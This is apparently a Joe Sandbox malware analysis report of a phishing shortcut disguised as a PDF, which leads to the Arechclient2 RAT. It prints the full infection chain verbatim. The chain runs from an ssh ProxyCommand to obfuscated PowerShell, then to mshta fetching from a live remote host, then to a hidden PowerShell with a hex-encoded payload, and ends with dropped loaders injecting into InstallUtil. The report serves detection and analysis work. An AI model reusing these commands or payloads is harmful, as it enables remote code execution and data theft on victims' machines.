Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_00A00EB7	14_2_00A00EB7
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009E8E44	14_2_009E8E44
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009B6FE6	14_2_009B6FE6
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009A33B7	14_2_009A33B7
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009894E0	14_2_009894E0
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009AF409	14_2_009AF409
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_0099D45D	14_2_0099D45D
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009A16B4	14_2_009A16B4
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_0098F6A0	14_2_0098F6A0
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_0099F628	14_2_0099F628
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009A78C3	14_2_009A78C3
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009A1BA8	14_2_009A1BA8
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009ADBA5	14_2_009ADBA5
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009B9CE5	14_2_009B9CE5
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_0099DD28	14_2_0099DD28
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009ABFD6	14_2_009ABFD6
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009A1FC0	14_2_009A1FC0
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_0176B382	14_2_0176B382
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_0176B389	14_2_0176B389

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\47891652\updater.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: String function: 00488B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: String function: 00471A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: String function: 00480D17 appears 70 times
Source: C:\ahdccea\AutoIt3.exe	Code function: String function: 009A0D17 appears 70 times
Source: C:\ahdccea\AutoIt3.exe	Code function: String function: 00991A36 appears 34 times
Source: C:\ahdccea\AutoIt3.exe	Code function: String function: 009A8B30 appears 42 times

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 3637
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 3637			Jump to behavior

Source: 14.2.AutoIt3.exe.442c974.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 11.2.updater.exe.417c974.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 11.2.updater.exe.417c974.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 16.2.AutoIt3.exe.3d1c974.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 16.2.AutoIt3.exe.3d1c974.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 14.2.AutoIt3.exe.442c974.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: Process Memory Space: powershell.exe PID: 6524, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 11.2.updater.exe.417c974.1.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.AutoIt3.exe.442c974.1.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 16.2.AutoIt3.exe.3d1c974.1.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winLNK@24/74@1/3

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004CA6AD GetLastError,FormatMessageW,

11_2_004CA6AD

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004B8DE9 AdjustTokenPrivileges,CloseHandle,	11_2_004B8DE9
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004B9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	11_2_004B9399
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009D8DE9 AdjustTokenPrivileges,CloseHandle,	14_2_009D8DE9
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009D9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	14_2_009D9399

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004CB976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

11_2_004CB976

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004C4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

11_2_004C4148

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004CC9DA CoInitialize,CoCreateInstance,CoUninitialize,

11_2_004CC9DA

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004C443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

11_2_004C443D

Source: C:\Windows\System32\OpenSSH\ssh.exe

File created: C:\Users\user\.ssh

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\84f8fd1fb316449d9e7b88f8c96e0316

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itlxbuof.3nd.ps1

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Agreement for Cooperation.PDF.lnk.download.lnk

Virustotal: Detection: 31%

Source: unknown	Process created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" .
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\47891652\updater.exe "C:\Users\user\AppData\Local\Temp\47891652\updater.exe" C:\Users\user\AppData\Local\Temp\47891652\bovZdOEN.bin
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown	Process created: C:\ahdccea\AutoIt3.exe "C:\ahdccea\AutoIt3.exe" C:\ahdccea\bdbhbhc.a3x
Source: C:\ahdccea\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown	Process created: C:\ahdccea\AutoIt3.exe "C:\ahdccea\AutoIt3.exe" C:\ahdccea\bdbhbhc.a3x
Source: C:\ahdccea\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\47891652\updater.exe "C:\Users\user\AppData\Local\Temp\47891652\updater.exe" C:\Users\user\AppData\Local\Temp\47891652\bovZdOEN.bin	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: libcrypto.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
